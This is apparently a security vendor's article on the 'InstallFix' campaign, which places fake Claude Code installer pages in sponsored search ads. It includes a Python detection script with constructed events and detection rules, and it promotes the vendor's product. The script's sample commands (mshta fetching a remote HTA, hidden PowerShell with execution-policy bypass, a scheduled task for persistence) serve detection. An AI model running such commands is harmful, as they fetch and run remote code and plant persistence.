Fake Claude AI installer phishing page delivering malware through sponsored Google Ads results

Cybercriminals are exploiting the growing popularity of AI tools by creating fake Claude AI installer pages designed to infect users with malware. Attackers are purchasing Google Ads to place fraudulent “Claude Code” installation pages at the top of search results, tricking users into running malicious commands on Windows and macOS systems. The campaign, known as “InstallFix,” focuses on manipulating user trust rather than exploiting software vulnerabilities directly.

Fake Claude AI installer phishing page delivering malware through sponsored Google Ads results

Once victims follow the fake installation steps, the malware launches a multi-stage infection chain that collects system information, disables security protections, creates persistence through scheduled tasks, and connects to attacker-controlled servers. Researchers linked the campaign to tactics previously associated with RedLine Stealer malware, including browser credential theft, e-wallet targeting, and stealthy command execution using legitimate Windows tools like mshta.exe and PowerShell. The use of customized command-and-control URLs for each victim makes detection and blocking more difficult.

Security experts recommend avoiding sponsored search results when downloading software, verifying installation pages through official vendor websites, and using trusted package managers whenever possible. Organizations should also restrict legacy scripting tools, block suspicious domains, and strengthen endpoint monitoring. NPAV EPS uses Zero Deep Learning AI to detect malicious scripts, fake installer activity, credential theft attempts, and advanced malware behavior before attackers can compromise systems.
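The monitoring advice above can be made concrete by correlating the stages the article describes (mshta.exe fetching a remote HTA, PowerShell spawned from it, a scheduled task created from a script host) rather than matching C2 domains, which the per-victim URLs defeat. The following is an added example, not code from the article or from NPAV; the process-creation events are constructed, and the host names, paths and the example.invalid domain are placeholders.

```python
"""Flag an InstallFix-style chain (mshta.exe -> PowerShell -> scheduled task)
in Sysmon-like process-creation events. All events below are constructed."""
import re
from collections import defaultdict

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SYS32 = r"C:\Windows\System32"

# Constructed sample events (hypothetical hosts and URLs, not real IoCs).
EVENTS = [
    {"host": "WS01", "parent": r"C:\Windows\explorer.exe", "image": SYS32 + r"\cmd.exe",
     "cmd": r"cmd.exe /c mshta https://example.invalid/v/a1b2c3/load.hta"},
    {"host": "WS01", "parent": SYS32 + r"\cmd.exe", "image": SYS32 + r"\mshta.exe",
     "cmd": r"mshta https://example.invalid/v/a1b2c3/load.hta"},
    {"host": "WS01", "parent": SYS32 + r"\mshta.exe", "image": PS,
     "cmd": r"powershell -w hidden -ep bypass -c iex(...)"},
    {"host": "WS01", "parent": PS, "image": SYS32 + r"\schtasks.exe",
     "cmd": r'schtasks /create /sc minute /mo 30 /tn Updater /tr "mshta https://example.invalid/v/a1b2c3/t.hta"'},
    {"host": "WS02", "parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmd": r"powershell Get-ChildItem C:\Temp"},  # benign admin use, must not fire
]

def _is(path, name):
    return path.lower().endswith("\\" + name)

# Each rule matches one stage of the chain described in the article.
RULES = {
    "mshta_remote": lambda e: _is(e["image"], "mshta.exe")
        and re.search(r"https?://", e["cmd"], re.I) is not None,
    "ps_from_mshta": lambda e: _is(e["image"], "powershell.exe")
        and _is(e["parent"], "mshta.exe"),
    "ps_hidden": lambda e: _is(e["image"], "powershell.exe")
        and re.search(r"-w(indowstyle)?\s+hidden", e["cmd"], re.I) is not None,
    "schtasks_from_script": lambda e: _is(e["image"], "schtasks.exe")
        and re.search(r"/create", e["cmd"], re.I) is not None
        and re.search(r"\\(powershell|mshta|cmd)\.exe$", e["parent"], re.I) is not None,
}

def evaluate(events):
    """Return {host: sorted list of rule names hit} for hosts with at least one hit."""
    hits = defaultdict(set)
    for e in events:
        for name, rule in RULES.items():
            if rule(e):
                hits[e["host"]].add(name)
    return {h: sorted(r) for h, r in hits.items()}

def verdict(rule_hits):
    """Two or more distinct stages on one host is the chain, whatever the C2 URL."""
    if len(rule_hits) >= 2:
        return "installfix_chain"
    return "suspicious" if rule_hits else "clean"

if __name__ == "__main__":
    for host, rules in evaluate(EVENTS).items():
        print(host, verdict(rules), rules)
```

The same rule set runs over real Sysmon Event ID 1 or EDR process telemetry once the three fields are mapped; the per-host correlation is what keeps a rotating C2 URL from evading it.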


Hackers are weaponizing trusted AI brands. NPAV EPS detects malicious installers, hidden payloads, and advanced malware behavior before damage begins.